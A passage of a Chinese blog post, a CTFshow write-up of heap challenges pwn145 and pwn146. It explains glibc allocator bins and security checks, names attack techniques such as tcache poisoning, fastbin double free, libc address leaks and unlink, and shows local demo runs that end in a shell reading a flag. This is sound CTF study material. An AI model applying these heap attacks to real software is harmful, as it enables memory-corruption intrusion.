{"id":737,"date":"2025-12-02T16:51:54","date_gmt":"2025-12-02T08:51:54","guid":{"rendered":"http:\/\/lycoreco.cn\/?p=737"},"modified":"2025-12-02T16:51:56","modified_gmt":"2025-12-02T08:51:56","slug":"ctfshow%e5%a0%86%e5%89%8d%e7%bd%aepwn145pwn149","status":"publish","type":"post","link":"http:\/\/lycoreco.cn\/index.php\/2025\/12\/02\/ctfshow%e5%a0%86%e5%89%8d%e7%bd%aepwn145pwn149\/","title":{"rendered":"ctfshow:\u5806\u524d\u7f6epwn145~pwn149"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\" id=\"xGhPA\">1\u3001pwn145<\/h2>\n\n\n\n<p id=\"ue9022f62\"><s>\u6ca1\u94b1\u4e86\u5b69\u5b50\u4eec\uff0c\u53ea\u80fd\u672c\u5730\u73a9\u73a9\u4e86<\/s><\/p>\n\n\n\n<p id=\"ub727bb72\">\u7ee7\u7eed\u5b66\u4e60\u5806\uff0c\u8fd9\u9053\u9898\u7684\u63d0\u793a\u662f\uff1aglibc\u7684\u4e00\u79cd\u5206\u914d\u89c4\u5219<\/p>\n\n\n\n<p id=\"u76fb4cb0\">\u9996\u5148\u67e5\u67e5glibc\u5206\u914d\u89c4\u5219\u662f\u4ec0\u4e48\uff1a<\/p>\n\n\n\n<div class=\"wp-block-group is-vertical is-layout-flex wp-container-core-group-is-layout-8cf370e7 wp-block-group-is-layout-flex\">\n<h5 class=\"wp-block-heading\" id=\"qMPGE\">glibc \u5806\u5185\u5b58\u6574\u4f53\u67b6\u6784<\/h5>\n\n\n\n<p id=\"u106aa794\"><mark style=\"background-color:#8ed1fc\" class=\"has-inline-color\">glibc \u4f7f\u7528 ptmalloc2 \u7ba1\u7406\u5806\uff0c\u57fa\u4e8e bins + tcache\uff082.26+\uff09<\/mark><\/p>\n\n\n\n<p id=\"u1ce435ab\"><mark style=\"background-color:#8ed1fc\" class=\"has-inline-color\">\u4e3b\u8981\u7ed3\u6784\uff1a<\/mark><\/p>\n\n\n\n<p id=\"ud9745744\"><mark style=\"background-color:#8ed1fc\" class=\"has-inline-color\">malloc \u2192 \u4ece tcache \u62ff \u2192 fastbin \u2192 smallbin \u2192 unsortedbin \u2192 largebin \u2192 top chunk<\/mark><\/p>\n\n\n\n<p id=\"u28b121b2\"><mark style=\"background-color:#8ed1fc\" class=\"has-inline-color\">free \u2192 \u5148 tcache \u2192 fastbin \u2192 unsortedbin \u2192 smallbin\/largebin<\/mark><\/p>\n<\/div>\n\n\n\n<div class=\"wp-block-group is-vertical 
is-layout-flex wp-container-core-group-is-layout-8cf370e7 wp-block-group-is-layout-flex\">\n<h5 class=\"wp-block-heading\" id=\"tl0NH\">\u5404\u79cd Bin \u7684\u4f5c\u7528\u4e0e\u7279\u70b9<\/h5>\n\n\n\n<h6 class=\"wp-block-heading\" id=\"YcbTl\">tcache\uff082.26+ \u65b0\u7279\u6027\uff09<\/h6>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u6bcf\u4e2a\u7ebf\u7a0b\u6709\u4e00\u7ec4 tcache bins<\/li>\n\n\n\n<li>\u6bcf\u4e2a bin \u6700\u591a\u5b58 7 \u4e2a chunk（满了之后再 free 同尺寸的 chunk 才会落到 fastbin / unsorted bin）<\/li>\n\n\n\n<li>\u94fe\u8868\u4e3a <strong>\u5355\u94fe\u8868<\/strong>（next 指针存放在用户数据区开头）<\/li>\n\n\n\n<li>free \u65f6\u4f18\u5148\u653e\u5165 tcache<\/li>\n\n\n\n<li>malloc \u65f6\u4f18\u5148\u4ece tcache \u62ff<\/li>\n<\/ul>\n\n\n\n<p>\u7528\u9014\uff1a\u52a0\u901f\u9891\u7e41\u7684\u5c0f\u5757\u5206\u914d<br>安全性：2.26 ~ 2.28 几乎没有任何检查，比 fastbin 更弱，是很多攻击（tcache poisoning、tcache double free）的重点；2.29+ 在 free 时用 chunk 的 key 字段检测同一个 chunk 被重复放入 tcache，2.32+ 又加入 safe-linking（next 指针与其自身地址的高位异或），伪造 next 指针之前需要先泄漏堆地址。<\/p>\n<\/div>\n\n\n\n<div class=\"wp-block-group is-vertical is-layout-flex wp-container-core-group-is-layout-8cf370e7 wp-block-group-is-layout-flex\">\n<h6 class=\"wp-block-heading\" id=\"TywWq\">fastbin<\/h6>\n\n\n\n<ul class=\"wp-block-list\">\n<li>chunk size \u8303\u56f4\uff1a<strong>0x20 ~ 0x80（64 位默认值，由 global_max_fast 决定；32 位为 0x10 ~ 0x40）<\/strong><\/li>\n\n\n\n<li>\u5355\u94fe\u8868（LIFO，fd 指向下一个空闲 chunk）<\/li>\n\n\n\n<li>FREE \u65f6\u4e0d\u5408\u5e76\uff08no consolidation\uff09<\/li>\n\n\n\n<li>MALLOC \u65f6\u4ece\u5bf9\u5e94\u7684 fastbin \u94fe\u8868\u53d6\u7b2c\u4e00\u4e2a（取出时会检查该 chunk 的 size 字段是否属于这个 fastbin，不匹配则 abort）<\/li>\n<\/ul>\n\n\n\n<p id=\"u1fdba18b\">\u4e3b\u8981\u6f0f\u6d1e\u5229\u7528\u70b9\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>double free<\/strong>（free 只检查 fastbin 链表头是否就是当前 chunk，所以 free(a); free(b); free(a) 这种顺序可以绕过）<\/li>\n\n\n\n<li>fastbin dup \u2192 借助 double free 改写空闲 chunk 的 fd，让后续 malloc 返回一个伪造的地址，从而\u4efb\u610f\u5199（目标地址处必须有一个能通过上面 size 检查的合法 size 字段）<\/li>\n<\/ul>\n<\/div>\n\n\n\n<h6 class=\"wp-block-heading\" id=\"b1gR3\">unsorted bin<\/h6>\n\n\n\n<ul class=\"wp-block-list\">\n<li>free \u7684\u5927\u591a\u6570 chunk \u6700\u5f00\u59cb\u90fd\u4f1a\u8fdb\u5165 unsorted 
bin<\/li>\n\n\n\n<li>\u4e00\u4e2a\u53cc\u5411\u94fe\u8868<\/li>\n\n\n\n<li>在下一次 malloc 时被遍历：大小正好匹配则直接返回，否则按大小归入 smallbin / largebin；如果它是 unsorted bin 里唯一的 chunk 且足够大，也可能被分割（last remainder）<\/li>\n\n\n\n<li>\u7ecf\u5e38\u7528\u4e8e <strong>leak libc \u5730\u5740<\/strong>（链表里只有一个 chunk 时，它的 fd / bk 都指向 libc 中 main_arena 里的 unsorted bin 头，读出来减去固定偏移就是 libc 基址；前提是有 UAF 读，或者 chunk 被重新分配时内容没有清零）<\/li>\n<\/ul>\n\n\n\n<p id=\"u2ccfdbd9\"><strong>smallbin<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>chunk size：固定大小（64 位下 0x20 ~ 0x3f0，每 0x10 一个 bin，共 62 个）<\/li>\n\n\n\n<li>\u53cc\u5411\u5faa\u73af\u94fe\u8868<\/li>\n\n\n\n<li>free 时并不直接进入 smallbin：tcache / fastbin 范围之外的 chunk 先进 unsorted bin，下一次 malloc 整理 unsorted bin 时才被归入 smallbin<\/li>\n\n\n\n<li>malloc \u65f6\u5fc5\u987b EXACT SIZE \u5339\u914d<\/li>\n<\/ul>\n\n\n\n<h6 class=\"wp-block-heading\" id=\"cbAcD\">largebin<\/h6>\n\n\n\n<ul class=\"wp-block-list\">\n<li>chunk \u6bd4 smallbin \u5927（64 位下 ≥ 0x400）<\/li>\n\n\n\n<li>同一个 bin 内按大小降序排列，并用 fd_nextsize / bk_nextsize 串联不同大小的 chunk（largebin attack 改写的就是这两个指针）<\/li>\n\n\n\n<li>malloc \u65f6\u4f1a\u5728 bin \u4e2d\u627e\u201c\u6700\u5408\u9002\u5757\u201d\uff08best fit\uff09<\/li>\n<\/ul>\n\n\n\n<p id=\"u69b58540\">\u8fd9\u90e8\u5206\u4e00\u822c\u7528\u4e8e\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>unlink attack<\/strong><\/li>\n\n\n\n<li><strong>largebin attack<\/strong><\/li>\n<\/ul>\n\n\n\n<div class=\"wp-block-group is-vertical is-layout-flex wp-container-core-group-is-layout-8cf370e7 wp-block-group-is-layout-flex\">\n<h5 class=\"wp-block-heading\" id=\"CQTDm\">glibc malloc \u7684\u6838\u5fc3\u6d41\u7a0b \uff1a<\/h5>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"66e8392f\"><strong>MALLOC(size)<\/strong> \u7b80\u5316\u6d41\u7a0b\uff1a<\/h5>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>tcache \u6709\uff1f\u76f4\u63a5\u53d6<\/strong><\/li>\n\n\n\n<li>fastbin \u6709\uff1f\u53d6（2.26+ 取完之后还会把同一个 fastbin 里剩余的 chunk 搬进 tcache）<\/li>\n\n\n\n<li>请求在 smallbin 范围内（64 位下 < 0x400）则先查对应 smallbin 是否有精确匹配<\/li>\n\n\n\n<li>遍历 unsorted bin：精确匹配就返回，否则把每个 chunk 按大小归入 smallbin / largebin（largebin 范围的请求在这一步之前还会先 malloc_consolidate 合并所有 fastbin chunk）<\/li>\n\n\n\n<li>在 largebin 及更大的 bin 里找 best fit，切剩下的部分放回 unsorted bin；都不够则从 <strong>top chunk \u5207\u5272<\/strong><\/li>\n\n\n\n<li>top chunk \u4e0d\u591f \u2192 \u89e6\u53d1 <strong>brk 
\u6216 mmap<\/strong><\/li>\n<\/ol>\n<\/div>\n\n\n\n<div class=\"wp-block-group is-vertical is-layout-flex wp-container-core-group-is-layout-8cf370e7 wp-block-group-is-layout-flex\">\n<h5 class=\"wp-block-heading\" id=\"SrBCY\">glibc free \u6d41\u7a0b \uff1a<\/h5>\n\n\n\n<h6 class=\"wp-block-heading\" id=\"ceVO3\">FREE(ptr) \u6d41\u7a0b\uff1a<\/h6>\n\n\n\n<ol class=\"wp-block-list\">\n<li>目标 chunk 大小在 tcache 范围内（64 位下 ≤ 0x410）且对应 bin 还没满 7 个？<br>\u2192 <strong>\u653e\u5165 tcache<\/strong>（2.26+；2.29+ 会先检查 key 字段，同一个 chunk 已经在 tcache 里则报 double free）<\/li>\n\n\n\n<li>fastbin \u5927\u5c0f\uff1f<br>\u2192 \u653e\u5165 fastbin（只检查链表头是否为同一个 chunk，以及物理相邻的下一个 chunk 的 size 是否合法）<\/li>\n\n\n\n<li>\u5426\u5219\uff1a<br>\u2192 先尝试和前后的空闲 chunk 合并（consolidation），合并时要对相邻 chunk 做 unlink；和 top chunk 相邻则直接并入 top<br>\u2192 合并后的 chunk 放入 unsorted bin<\/li>\n<\/ol>\n\n\n\n<p id=\"u9b5f53d5\">\u5408\u5e76\u884c\u4e3a\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>fastbin chunk <strong>\u4e0d\u5408\u5e76<\/strong>（只有在 malloc_consolidate 时才会被合并并挂到 unsorted bin，例如申请 largebin 范围的 chunk，或者 free 后合并出的 chunk 超过 FASTBIN_CONSOLIDATION_THRESHOLD 时）<\/li>\n\n\n\n<li>tcache / fastbin 范围之外的 chunk（small / large）free 时会向前、向后合并相邻的空闲 chunk<\/li>\n\n\n\n<li>合并是在 free 路径上、挂入 unsorted bin 之前完成的；下一次 malloc 只负责把 unsorted bin 里的 chunk 归类到 smallbin / largebin，不再做合并<\/li>\n<\/ul>\n<\/div>\n\n\n\n<p id=\"u85a339c8\">\u5927\u6982\u5c31\u8bb0\u5f55\u8fd9\u4e9b\uff0c\u7136\u540e\u5f00\u59cb\u5206\u6790\u8fd9\u4e2a\u7a0b\u5e8f<\/p>\n\n\n\n<p id=\"ue4b6c135\">checksec:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-13-1024x439.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"439\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-13-1024x439.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-738\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u26113119\">64\u4f4d\u5f00\u4e86canary\u548cNX,\u8fd0\u884c\u770b\u770b\u60c5\u51b5\uff08\u81ea\u5df1\u5728\u672c\u5730\u5199\u4e86flag\uff09<\/p>\n\n\n\n<p id=\"ua2bffd36\">\u662f\u4e00\u4e2a\u6f14\u793a\u8fc7\u7a0b\uff0c\u6f14\u793a\u5b8c\u8f93\u5165sh\u5c31\u53ef\u4ee5\u67e5\u770bflag<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>faetong@faetong-virtual-machine:~\/pwnit$ .\/pwn145\n    \u2584\u2584\u2584\u2584   \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584  \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584            \u2584\u2584                           \n  \u2588\u2588\u2580\u2580\u2580\u2580\u2588  \u2580\u2580\u2580\u2588\u2588\u2580\u2580\u2580  \u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580            \u2588\u2588                           \n \u2588\u2588\u2580          \u2588\u2588     \u2588\u2588        \u2584\u2584\u2588\u2588\u2588\u2588\u2588\u2584  \u2588\u2588\u2584\u2588\u2588\u2588\u2588\u2584   \u2584\u2588\u2588\u2588\u2588\u2584  \u2588\u2588      \u2588\u2588\n \u2588\u2588           \u2588\u2588     \u2588\u2588\u2588\u2588\u2588\u2588\u2588   \u2588\u2588\u2584\u2584\u2584\u2584 \u2580  \u2588\u2588\u2580   \u2588\u2588  \u2588\u2588\u2580  \u2580\u2588\u2588 \u2580\u2588  \u2588\u2588  \u2588\u2580\n \u2588\u2588\u2584          \u2588\u2588     \u2588\u2588         \u2580\u2580\u2580\u2580\u2588\u2588\u2584  \u2588\u2588    \u2588\u2588  \u2588\u2588    \u2588\u2588  \u2588\u2588\u2584\u2588\u2588\u2584\u2588\u2588 \n  \u2588\u2588\u2584\u2584\u2584\u2584\u2588     \u2588\u2588     \u2588\u2588        \u2588\u2584\u2584\u2584\u2584\u2584\u2588\u2588  \u2588\u2588    \u2588\u2588  
\u2580\u2588\u2588\u2584\u2584\u2588\u2588\u2580  \u2580\u2588\u2588  \u2588\u2588\u2580 \n    \u2580\u2580\u2580\u2580      \u2580\u2580     \u2580\u2580         \u2580\u2580\u2580\u2580\u2580\u2580   \u2580\u2580    \u2580\u2580    \u2580\u2580\u2580\u2580     \u2580\u2580  \u2580\u2580  \n    * *************************************                           \n    * Classify: CTFshow --- PWN --- \u5165\u95e8                              \n    * Type  : Heap_Exploitation                                       \n    * Site  : https:\/\/ctf.show\/                                       \n    * Hint  : Why it can UAF(use after free) ?                        \n    * *************************************                           \n\u6f14\u793aglibc \u7684\u5206\u914d\u673a\u5236\nglibc \u4f7f\u7528\u9996\u6b21\u9002\u5e94\u7b97\u6cd5\u9009\u62e9\u7a7a\u95f2\u7684\u5806\u5757\n\u5982\u679c\u6709\u4e00\u4e2a\u7a7a\u95f2\u5806\u5757\u4e14\u8db3\u591f\u5927\uff0c\u90a3\u4e48 malloc \u5c06\u9009\u62e9\u5b83\n\u5982\u679c\u5b58\u5728 use-after-free \u7684\u60c5\u51b5\u90a3\u53ef\u4ee5\u5229\u7528\u8fd9\u4e00\u7279\u6027\n\u9996\u5148\u7533\u8bf7\u4e24\u4e2a\u6bd4\u8f83\u5927\u7684 chunk\n\u7b2c\u4e00\u4e2a a = malloc(0x512) \u5728: 0x2a80b2a0\n\u7b2c\u4e8c\u4e2a b = malloc(0x256) \u5728: 0x2a80b7c0\n\u6211\u4eec\u53ef\u4ee5\u7ee7\u7eed\u5206\u914d\u5b83\n\u73b0\u5728\u6211\u4eec\u628a \"AAAAAAAA\" \u8fd9\u4e2a\u5b57\u7b26\u4e32\u5199\u5230 a \u90a3\u91cc \n\u7b2c\u4e00\u6b21\u7533\u8bf7\u7684 0x2a80b2a0 \u6307\u5411 AAAAAAAA\n\u63a5\u4e0b\u6765 free \u6389\u7b2c\u4e00\u4e2a...\n\u63a5\u4e0b\u6765\u53ea\u8981\u6211\u4eec\u7533\u8bf7\u4e00\u5757\u5c0f\u4e8e 0x512 \u7684 chunk\uff0c\u90a3\u5c31\u4f1a\u5206\u914d\u5230\u539f\u672c a \u90a3\u91cc: 0x2a80b2a0\n\u7b2c\u4e09\u6b21 c = malloc(0x500) \u5728: 0x2a80b2a0\n\u6211\u4eec\u8fd9\u6b21\u5f80\u91cc\u5199\u4e00\u4e32 \"CCCCCCCC\" \u5230\u521a\u7533\u8bf7\u7684 c \u4e2d\n\u7b2c\u4e09\u6b21\u7533\u8bf7\u7684 c 0x2a80b2a0 
\u6307\u5411 CCCCCCCC\n\u7b2c\u4e00\u6b21\u7533\u8bf7\u7684 a 0x2a80b2a0 \u6307\u5411 CCCCCCCC\n\u53ef\u4ee5\u770b\u5230\uff0c\u867d\u7136\u6211\u4eec\u521a\u521a\u770b\u7684\u662f a \u7684\uff0c\u4f46\u5b83\u7684\u5185\u5bb9\u5374\u662f \"CCCCCCCC\"\nsh\n$ ls\nflag  pwn145\n$ cat flag\nflag{Inoue_Takina}\n$ \n<\/code><\/pre>\n\n\n\n<p id=\"ufd74e90e\">\u6f14\u793a\u7684\u662f\u4e00\u79cdglibc\u5206\u914d\u89c4\u5219\uff0c\u7eaf\u6f14\u793a\uff0c\u76f4\u63a5\u4e0b\u4e00\u9053\u9898\u5427<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"IpYje\">2\u3001pwn146\uff08\u4e3a\u4ec0\u4e48\u4f1a\u4ea7\u751fUAF\u6f0f\u6d1e\uff1f\uff09<\/h2>\n\n\n\n<p id=\"u63c34e27\">\u9898\u76ee\u63d0\u793a\uff1a\u4e3a\u4ec0\u4e48\u4f1a\u4ea7\u751fUAF\u6f0f\u6d1e\uff1f<\/p>\n\n\n\n<div class=\"wp-block-group is-vertical is-layout-flex wp-container-core-group-is-layout-8cf370e7 wp-block-group-is-layout-flex\">\n<h6 class=\"wp-block-heading\" id=\"w2Y3D\">UAF\u6f0f\u6d1e\uff1a<\/h6>\n\n\n\n<p id=\"u8ad751fb\">\u82f1\u6587\u7684\u8bdd\u66f4\u597d\u7406\u89e3UAF\u662f\u4ec0\u4e48\u610f\u601d\uff1a Use-After-Free<\/p>\n\n\n\n<p id=\"ud130961b\">\u6982\u5ff5\uff1a\u7a0b\u5e8f \u5df2\u7ecf\u901a\u8fc7 free\/delete \u91ca\u653e\u4e86\u67d0\u5757\u5806\u5185\u5b58\uff0c\u4f46\u4e4b\u540e\u4ecd\u7136\u901a\u8fc7 \u60ac\u6302\u6307\u9488\uff08dangling pointer\uff09 \u5bf9\u8fd9\u5757\u5df2\u91ca\u653e\u7684\u5185\u5b58\u8fdb\u884c\u8bbf\u95ee\uff08\u8bfb\u3001\u5199\u6216\u6267\u884c\uff09\u3002<\/p>\n\n\n\n<p id=\"u6d11fed1\">\u5927\u767d\u8bdd\u8bb2\u5c31\u662f\uff1a \u5185\u5b58\u5df2\u7ecf\u88ab free \u6389\u4e86\uff0c\u7a0b\u5e8f\u5374\u8fd8\u7ee7\u7eed\u628a\u5b83\u5f53\u6b63\u5e38\u6570\u636e\u6765\u7528\u3002<\/p>\n\n\n\n<p id=\"u33102909\">\u4eba\u673a\u7ed9\u4e86\u4e00\u4e2a\u5e7d\u9ed8\u7684\uff1a 
\u5c31\u50cf\u4f60\u628a\u51fa\u79df\u5c4b\u9000\u79df\u4e86\uff0c\u4f46\u4f60\u8fd8\u5077\u5077\u62ff\u7740\u94a5\u5319\u8fdb\u53bb\u4f4f\u4e00\u6837\uff08\u5371\u9669\u5f97\u5f88\uff09\u3002<\/p>\n\n\n\n<h6 class=\"wp-block-heading\" id=\"POiEA\">\u901a\u5e38\u51fa\u73b0\u7684\u60c5\u51b5<\/h6>\n\n\n\n<p id=\"u5682593f\">free\u4e4b\u540e\u6ca1\u6709\u628a\u6307\u9488\u6e05\u7a7a<\/p>\n<\/div>\n\n\n\n<pre class=\"wp-block-code\"><code>char *p = malloc(0x20);\nfree(p);\nprintf(\"%s\\n\", p); \/\/ p \u8fd8\u5728\u7528\uff0c\u70b8\uff01\n\/\/\u8fd9\u91cc p \u6307\u5411\u7684\u5185\u5b58\u5df2\u7ecf\u88ab\u6807\u8bb0\u4e3a\u53ef\u91cd\u7528\uff0c\u4f46\u7a0b\u5e8f\u8fd8\u4ee5\u4e3a\u5b83\u6709\u6548\u3002<\/code><\/pre>\n\n\n\n<p><br>\u4e00\u4e2a\u5bf9\u8c61\u88ab\u591a\u51fa\u5f15\u7528<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Node* a = malloc(sizeof(Node));\nNode* b = a;\nfree(a);\nb->value = 123; \/\/ b \u8fd8\u5728\u5199\uff0c\u5176\u5b9e\u5bf9\u8c61\u5df2\u7ecf free<\/code><\/pre>\n\n\n\n<p id=\"u609679fe\">\u63a5\u4e0b\u6765\u770b\u770b\u8fd9\u4e2a\u9898\u5427<\/p>\n\n\n\n<p id=\"uf64168f8\">checksec:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-14-1024x438.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"438\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-14-1024x438.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-739\"  sizes=\"auto, (max-width: 1024px) 
100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u48bcc649\">\u5f00\u4e86canary\u548cnx<\/p>\n\n\n\n<p id=\"ud66cebcd\">\u8fd0\u884c\u4e00\u4e0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-15-1024x246.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"246\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-15-1024x246.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-740\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u7ed3\u5408\u53cd\u6c47\u7f16\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>void __cdecl demo()\n{\n  ptr *p1; \/\/ &#91;rsp+0h] &#91;rbp-20h]\n  ptr *p2; \/\/ &#91;rsp+8h] &#91;rbp-18h]\n  char c&#91;8]; \/\/ &#91;rsp+10h] &#91;rbp-10h] BYREF\n  unsigned __int64 v3; \/\/ &#91;rsp+18h] &#91;rbp-8h]\n\n  v3 = __readfsqword(0x28u);\n  printf(&amp;format_);\n  p1 = (ptr *)malloc(0x20u);\n  printf(aP1, p1);\n  p1&#91;1] = (ptr)Printf;\n  puts(&amp;s_);\n  p1&#91;1](\"Hello CTFshow\\n\\n\");\n  puts(aFree_0);\n  free(p1);\n  puts(&amp;s__0);\n  p1&#91;1](\"Hello CTFshow again\\n\");\n  puts(&amp;s__1);\n  p2 = (ptr *)malloc(0x20u);\n  printf(aP2, p2);\n  printf(aP1, p1);\n  puts(&amp;s__2);\n  puts(\"Then get the flag &amp;&amp; enjoy it !\\n\");\n  p2&#91;1] = (ptr)demoflag;\n  putchar(36);\n  __isoc99_scanf(\"%2s\", c);\n  
p1&#91;1](c);\n}<\/code><\/pre>\n\n\n\n<p><br>\u5f00\u59cb\u662f\u5206\u914d\u4e86\u5806\u7a7a\u95f4->p1[1]=printf->\u8ba9p1[1]\u8f93\u51faHello CTFshow->\u91ca\u653ep1\u4f46\u5e76\u6ca1\u6709\u7f6e\u96f6\uff0c\u5176\u5b9e\u540e\u9762\u5e94\u8be5\u7f6e\u96f6\u4e4b\u540e\u4ecd\u7136\u53ef\u4ee5\u6253\u5370Hello CTFshow<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    \u2584\u2584\u2584\u2584   \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584  \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584            \u2584\u2584                           \n  \u2588\u2588\u2580\u2580\u2580\u2580\u2588  \u2580\u2580\u2580\u2588\u2588\u2580\u2580\u2580  \u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580            \u2588\u2588                           \n \u2588\u2588\u2580          \u2588\u2588     \u2588\u2588        \u2584\u2584\u2588\u2588\u2588\u2588\u2588\u2584  \u2588\u2588\u2584\u2588\u2588\u2588\u2588\u2584   \u2584\u2588\u2588\u2588\u2588\u2584  \u2588\u2588      \u2588\u2588\n \u2588\u2588           \u2588\u2588     \u2588\u2588\u2588\u2588\u2588\u2588\u2588   \u2588\u2588\u2584\u2584\u2584\u2584 \u2580  \u2588\u2588\u2580   \u2588\u2588  \u2588\u2588\u2580  \u2580\u2588\u2588 \u2580\u2588  \u2588\u2588  \u2588\u2580\n \u2588\u2588\u2584          \u2588\u2588     \u2588\u2588         \u2580\u2580\u2580\u2580\u2588\u2588\u2584  \u2588\u2588    \u2588\u2588  \u2588\u2588    \u2588\u2588  \u2588\u2588\u2584\u2588\u2588\u2584\u2588\u2588 \n  \u2588\u2588\u2584\u2584\u2584\u2584\u2588     \u2588\u2588     \u2588\u2588        \u2588\u2584\u2584\u2584\u2584\u2584\u2588\u2588  \u2588\u2588    \u2588\u2588  \u2580\u2588\u2588\u2584\u2584\u2588\u2588\u2580  \u2580\u2588\u2588  \u2588\u2588\u2580 \n    \u2580\u2580\u2580\u2580      \u2580\u2580     \u2580\u2580         \u2580\u2580\u2580\u2580\u2580\u2580   \u2580\u2580    \u2580\u2580    \u2580\u2580\u2580\u2580     \u2580\u2580  \u2580\u2580  \n    * *************************************                           \n    * Classify: 
CTFshow --- PWN --- \u5165\u95e8                              \n    * Type  : Heap_Exploitation                                       \n    * Site  : https:\/\/ctf.show\/                                       \n    * Hint  : Why it can UAF(use after free) ?                        \n    * *************************************                           \n\u7533\u8bf70x20\u5927\u5c0f\u7684\u5185\u5b58p1 \u7684\u5730\u5740: 0x13ba010\n\u628ap1&#91;1]\u8d4b\u503c\u4e3aPrintf\u51fd\u6570\uff0c\u7136\u540e\u6253\u5370\u51fa\"Hello CTFshow\"\nHello CTFshow\n\nfree \u6389 p1\n\u56e0\u4e3a\u5e76\u6ca1\u6709\u7f6e\u4e3anull\uff0c\u6240\u4ee5p1&#91;1]\u4ecd\u7136\u662fPrintf\u51fd\u6570\uff0c\u4ecd\u7136\u53ef\u4ee5\u8f93\u51fa\u6253\u5370\u4e86\"Hello CTFshow again\"\nHello CTFshow again\n\u63a5\u4e0b\u6765\u518d\u53bbmalloc\u4e00\u4e2ap2\uff0c\u4f1a\u628a\u91ca\u653e\u6389\u7684p1\u7ed9\u5206\u914d\u51fa\u6765\uff0c\u53ef\u4ee5\u770b\u5230\u4ed6\u4fe9\u662f\u540c\u4e00\u5730\u5740\u7684\np2 \u7684\u5730\u5740: 0x13ba010\np1 \u7684\u5730\u5740: 0x13ba010\n\u7136\u540e\u628ap2&#91;1]\u7ed9\u6539\u6210demoflag\u4e5f\u5c31\u662fsystem\u51fd\u6570\n\nThen get the flag &amp;&amp; enjoy it !<\/code><\/pre>\n\n\n\n<p><br>\u8c03\u8bd5\u770b\u770b\uff0c\u9996\u5148\u6267\u884c\u5230malloc<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-16-1024x324.png'><img class=\"lazyload 